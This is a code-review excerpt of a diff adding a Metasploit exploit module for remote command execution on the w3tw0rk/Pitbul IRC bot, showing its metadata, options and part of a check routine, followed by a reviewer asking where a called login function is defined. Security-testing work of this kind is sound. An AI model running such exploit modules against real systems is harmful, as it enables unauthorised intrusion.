modules/exploits/multi/misc/w3tw0rk_exec.rb

```diff
@@ -0,0 +1,160 @@
+##
+# This module requires Metasploit: http://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require 'msf/core'
+
+
+class Metasploit3 < Msf::Exploit::Remote
+  Rank = AverageRanking
+
+  include Msf::Exploit::Remote::Tcp
+
+  def initialize(info = {})
+    super(update_info(info,
+      'Name'           => 'w3tw0rk / Pitbul IRC Bot  Remote Code Execution',
+      'Description'    => %q{
+          This module allows remote command execution on the w3tw0rk / Pitbul IRC Bot.
+        },
+      'Author'         =>
+        [
+          'Jay Turla'
+        ],
+      'License'        => MSF_LICENSE,
+      'References'     =>
+        [
+          [ 'OSVDB', '120384' ],
+          [ 'EDB', '36652' ]
+        ],
+      'Platform'       => %w{ unix win },
+      'Arch'           => ARCH_CMD,
+      'Payload'        =>
+        {
+          'Space'    => 300, # According to RFC 2812, the max length message is 512, including the cr-lf
+          'BadChars' => '',
+          'DisableNops' => true,
+          'Compat'      =>
+            {
+              'PayloadType' => 'cmd',
+            }
+        },
+      'Targets'  =>
+        [
+          [ 'w3tw0rk', { } ]
+        ],
+      'Privileged'     => false,
+      'DisclosureDate' => 'Jun 04 2015',
+      'DefaultTarget'  => 0))
+
+    register_options(
+      [
+        Opt::RPORT(6667),
+        OptString.new('IRC_PASSWORD', [false, 'IRC Connection Password', '']),
+        OptString.new('NICK', [true, 'IRC Nickname', 'msf_user']),
+        OptString.new('CHANNEL', [true, 'IRC Channel', '#channel'])
+      ], self.class)
+  end
+
+  def check
+    connect
+
+    response = register(sock)
+    if response =~ /463/ or response =~ /464/
+      vprint_error("#{rhost}:#{rport} - Connection to the IRC Server not allowed")
+      return Exploit::CheckCode::Unknown
+    end
+
+    response = join(sock)
+    if not response =~ /353/ and not response =~ /366/
+      vprint_error("#{rhost}:#{rport} - Error joining the #{datastore['CHANNEL']} channel")
+      return Exploit::CheckCode::Unknown
+    end
+    response = w3tw0rk_login(sock)
```

Comment:
Where is this function actually defined (w3tw0rk_login)? I don't see it in the code...